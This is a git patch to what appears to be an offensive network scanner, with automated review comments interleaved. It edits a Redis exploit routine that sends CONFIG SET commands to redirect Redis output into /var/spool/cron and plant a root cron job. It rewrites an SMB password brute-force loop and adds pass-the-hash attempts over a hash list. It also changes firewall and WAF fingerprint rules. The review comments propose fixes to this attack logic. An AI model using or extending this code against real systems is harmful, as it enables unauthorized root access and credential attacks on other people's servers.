From 513bb93e1bb8135675b2870550b3f0b47e0b6d4c Mon Sep 17 00:00:00 2001
From: shadow1ng
Date: Thu, 29 Aug 2024 09:50:32 +0800
Subject: [PATCH] update
---
 Plugins/redis.go | 23 ++++----
 Plugins/smb2.go | 118 +++++++++++++++++++++++++++++-------------
 WebScan/info/rules.go | 4 +-
 3 files changed, 97 insertions(+), 48 deletions(-)
diff --git a/Plugins/redis.go b/Plugins/redis.go
index e69feb9..88ad73d 100644
--- a/Plugins/redis.go
+++ b/Plugins/redis.go
@@ -118,6 +118,9 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 }
 func Expoilt(realhost string, conn net.Conn) error {
+ if common.Noredistest {
+ return nil
+ }
 flagSsh, flagCron, err := testwrite(conn)
 if err != nil {
 return err
@@ -221,26 +224,26 @@ func writekey(conn net.Conn, filename string) (flag bool, text string, err error
 func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
 flag = false
- // 尝试写入Ubuntu的路径
- _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/crontabs/\r\n"))
- if err != nil {
- return flag, text, err
- }
- text, err = readreply(conn)
+ // 尝试写入Ubuntu的路径
+ _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/crontabs/\r\n"))
 if err != nil {
 return flag, text, err
 }
- if !strings.Contains(text, "OK") {
+ text, err = readreply(conn)
+ if err != nil {
+ return flag, text, err
+ }
+ if !strings.Contains(text, "OK") {
 // 如果没有返回"OK",可能是CentOS,尝试CentOS的路径
 _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/\r\n"))
 if err != nil {
- return flag, text, err
+ return flag, text, err
 }
 text, err = readreply(conn)
 if err != nil {
- return flag, text, err
+ return flag, text, err
 }
- }
+ }
 if strings.Contains(text, "OK") {
 _, err = conn.Write([]byte("CONFIG SET dbfilename root\r\n"))
 if err != nil {
diff --git a/Plugins/smb2.go b/Plugins/smb2.go
index 1204e3e..57c52ff 100644
--- a/Plugins/smb2.go
+++ b/Plugins/smb2.go
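Review bot: The new `common.Noredistest` guard at the top of Expoilt returns nil, the same value a completed run returns, so RedisUnauth (the caller named in the hunk header) cannot tell "skipped" from "ran and found nothing", and nothing documents that. Add a doc comment above the signature, e.g. `// Expoilt returns nil immediately when common.Noredistest is set; callers cannot distinguish that from a completed run.`, or log the skip at the same spot if the distinction matters to the caller. The exported name is also a misspelling of Exploit, but renaming it is outside this change. Expoilt's body continues past the hunk, and the second hunk in this file is indentation-only.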
@@ -17,51 +17,97 @@ func SmbScan2(info *common.HostInfo) (tmperr error) {
 }
 hasprint := false
 starttime := time.Now().Unix()
- hash := common.HashBytes
- for _, user := range common.Userdict["smb"] {
- PASS:
- for _, pass := range common.Passwords {
- pass = strings.Replace(pass, "{user}", user, -1)
- flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
- if flag2 {
- hasprint = true
- }
- if flag == true {
- var result string
- if common.Domain != "" {
- result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
- } else {
- result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
+ if len(common.HashBytes) > 0 {
+ for _, user := range common.Userdict["smb"] {
+ for _, hash := range common.HashBytes {
+ pass := ""
+ flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
+ if flag2 {
+ hasprint = true
 }
- if len(hash) > 0 {
- result += "hash: " + common.Hash
+ if flag == true {
+ var result string
+ if common.Domain != "" {
+ result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
+ } else {
+ result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
+ }
+ if len(hash) > 0 {
+ result += "hash: " + common.Hash
+ } else {
+ result += pass
+ }
+ common.LogSuccess(result)
+ return err
 } else {
- result += pass
+ var errlog string
+ if len(common.Hash) > 0 {
+ errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
+ } else {
+ errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
+ }
+ errlog = strings.Replace(errlog, "\n", " ", -1)
+ common.LogError(errlog)
+ tmperr = err
+ if common.CheckErrs(err) {
+ return err
+ }
+ if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.HashBytes)) * common.Timeout) {
+ return err
+ }
 }
- common.LogSuccess(result)
- return err
- } else {
- var errlog string
 if len(common.Hash) > 0 {
- errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
- } else {
- errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
- }
- errlog = strings.Replace(errlog, "\n", " ", -1)
- common.LogError(errlog)
- tmperr = err
- if common.CheckErrs(err) {
- return err
- }
- if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
- return err
+ break
 }
 }
- if len(common.Hash) > 0 {
- break PASS
+ }
+ } else {
+ for _, user := range common.Userdict["smb"] {
+ for _, pass := range common.Passwords {
+ pass = strings.Replace(pass, "{user}", user, -1)
+ hash := []byte{}
+ flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
+ if flag2 {
+ hasprint = true
+ }
+ if flag == true {
+ var result string
+ if common.Domain != "" {
+ result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
+ } else {
+ result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
+ }
+ if len(hash) > 0 {
+ result += "hash: " + common.Hash
+ } else {
+ result += pass
+ }
+ common.LogSuccess(result)
+ return err
+ } else {
+ var errlog string
+ if len(common.Hash) > 0 {
+ errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
+ } else {
+ errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
+ }
+ errlog = strings.Replace(errlog, "\n", " ", -1)
+ common.LogError(errlog)
+ tmperr = err
+ if common.CheckErrs(err) {
+ return err
+ }
+ if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
+ return err
+ }
+ }
+ if len(common.Hash) > 0 {
+ break
+ }
 }
 }
 }
+ return tmperr
 }
diff --git a/WebScan/info/rules.go b/WebScan/info/rules.go
index 939b981..e7184db 100644
--- a/WebScan/info/rules.go
+++ b/WebScan/info/rules.go
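Review bot: In the new `for _, hash := range common.HashBytes` branch both the success line and the error line still print `common.Hash` rather than the `hash` value just handed to Smb2Con, so when HashBytes holds more than one entry the log never records which one an attempt used, and the trailing `if len(common.Hash) > 0 { break }` leaves that inner loop after a single iteration, which looks like a leftover of the old `break PASS` rather than something intended for a per-hash loop; confirm the intent and format the iterated value (`hex.EncodeToString(hash)` or whatever the project uses) in both messages. The password branch has the mirror defect: `hash := []byte{}` makes its `if len(hash) > 0` arm unreachable, and `flag == true` should be just `flag` in both branches. The two branches are otherwise about forty lines of duplicated success/error reporting differing only in which of pass/hash varies and which length feeds the timeout product; extracting the attempt-plus-logging into one helper returning (done bool, err error) would leave SmbScan2 as two short loops. SmbScan2's signature and opening lines are before this hunk.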
@@ -17,7 +17,7 @@ type PocData struct {
 }
 var RuleDatas = []RuleData{
- {"宝塔", "body", "(app.bt.cn/static/app.png|安全入口校验失败|入口校验失败|href=\"http://www.bt.cn/bbs)"},
+ {"宝塔", "code", "(app.bt.cn/static/app.png|安全入口校验失败|入口校验失败|href=\"http://www.bt.cn/bbs)"},
 {"深信服防火墙类产品", "code", "(SANGFOR FW)"},
 {"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"},
 {"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"},
@@ -55,7 +55,7 @@ var RuleDatas = []RuleData{
 {"Yundun", "headers", "(YUNDUN)"},
 {"Yunsuo", "headers", "(yunsuo)"},
 {"Coding pages", "header", "(Coding Pages)"},
- {"启明防火墙", "body", "(/cgi-bin/webui?op=get_product_model)"},
+ {"启明防火墙", "code", "(/cgi-bin/webui?op=get_product_model)"},
 {"Shiro", "headers", "(=deleteMe|rememberMe=)"},
 {"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
 {"Gogs简易Git服务", "cookie", "(i_like_gogs)"},
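Review bot: The second hunk normalizes `"body"` to `"code"` for 启明防火墙 but leaves the context line `{"Coding pages", "header", "(Coding Pages)"}` one entry above it using the singular `header`, while every other header rule in view says `headers`; if the matcher dispatches on the exact string (not visible here) that rule can never fire. It belongs in the same cleanup: `{"Coding pages", "headers", "(Coding Pages)"},`. The RuleDatas literal starts before the first hunk and continues past the second.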